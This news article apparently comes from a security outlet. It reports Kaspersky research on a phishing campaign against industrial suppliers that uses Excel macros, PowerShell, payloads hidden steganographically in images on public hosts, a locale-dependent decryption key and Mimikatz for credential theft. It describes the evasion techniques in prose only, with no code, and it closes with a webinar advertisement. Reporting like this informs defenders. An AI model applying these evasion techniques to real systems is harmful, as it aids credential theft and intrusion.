A targeted series of attacks on suppliers of equipment and software for industrial enterprises is playing out globally, researchers said, hinging on phishing and a steganography tactic to hide malware on public, legitimate image resources.
According to Kaspersky ICS CERT, the attacks seem bent on stealing Windows credentials in order to lay the groundwork for lateral movement inside a target network and follow-on activity. They have so far been seen being mounted on systems in Germany, Italy, Japan and the U.K. The kill chain starts with phishing emails, which are tailored and customized to the specific language for each victim.
“For example, in the case of an attack on a company from Japan, the text of a phishing email and a Microsoft Office document containing a malicious macro were written in Japanese,” researchers explained, in an analysis on Thursday. “Also, to successfully decrypt the malware module, the operating system must have had a Japanese localization as well.”
The emails contain an “urgent request” to open an attached document. It’s an Excel spreadsheet with a malicious macro; users are requested to enable active content, which triggers the malicious PowerShell script.
“The script is executed in spite of the configured policy, in a hidden window and without loading the user configuration,” according to Kaspersky.
It goes on to randomly select one of the URL addresses included in the coding – which leads to the legitimate public image hosting services called imgur.com and imgbox.com. The script then downloads an image and starts a data-extraction procedure.
Steganography Tactic
The data is hidden in the downloaded image, and is parsed out by the malware from pixels as defined by an algorithm in the script. Hiding malware in an image file, known as steganography, is a well-known though not that common way to circumvent detection – many filters and gateways let image file formats pass without too much scrutiny.
In this case, the data is encoded with several encryption layers (using the Base64 and RSA algorithms), which, when decrypted and decoded, is assembled into a secondary PowerShell script, which Kaspersky flagged as an advanced technique.
“The malicious module is encoded in an image using steganographic techniques and the image is hosted on legitimate web resources,” according to the research. “This makes it virtually impossible to detect such malware using network traffic monitoring and control tools while it is being downloaded. From the standpoint of technical solutions, this activity is indistinguishable from sending ordinary requests to legitimate image hosting services.”
Here too, the geolocation aspect of the campaign is evident.
“Curiously, the script has an error in its code, included on purpose, with the exception message used as the decryption key,” said the researchers. “Notably, the text in the exception message depends on the language pack installed in the operating system. Apparently, the attackers prepare the malicious script specifically for victims from a particular country.”
The use of the exception message as the decryption key for the malicious payload is notable, the researchers said – and it also can help the malware evade detection in sandboxes. Also, it “makes analyzing the functionality of the malware significantly more difficult for researchers if they do not know what language pack was used on the victim’s computer,” they said.
Meanwhile, the second PowerShell script in turn unpacks itself into a third PowerShell script, which turns out to be an obfuscated sample of the Mimikatz utility, used to steal Windows account credentials from a compromised system.
“Criminals can use this information to gain access to other systems on the enterprise network and move laterally,” according to the analysis. “It is a particularly dangerous situation if attackers obtain the credentials for accounts with domain administrator privileges.”
The ultimate goal of the criminals remains unknown, researchers said.
“The use of [steganography], combined with the pinpoint nature of the infections, indicates that these were targeted attacks,” the researchers concluded. “It is a matter of concern that attack victims include contractors of industrial enterprises. If the attackers are able to harvest the credentials of a contractor organization’s employees, this can lead to a range of negative consequences, from the theft of sensitive data to attacks on industrial enterprises via remote administration tools used by the contractor.”
Concerned about the IoT security challenges businesses face as more connected devices run our enterprises, drive our manufacturing lines, track and deliver healthcare to patients, and more? On June 3 at 2 p.m. ET, join renowned security technologist Bruce Schneier, Armis CISO Curtis Simpson and Threatpost for a FREE webinar, Taming the Unmanaged and IoT Device Tsunami. Get exclusive insights on how to manage this new and growing attack surface. Please register here for this sponsored webinar.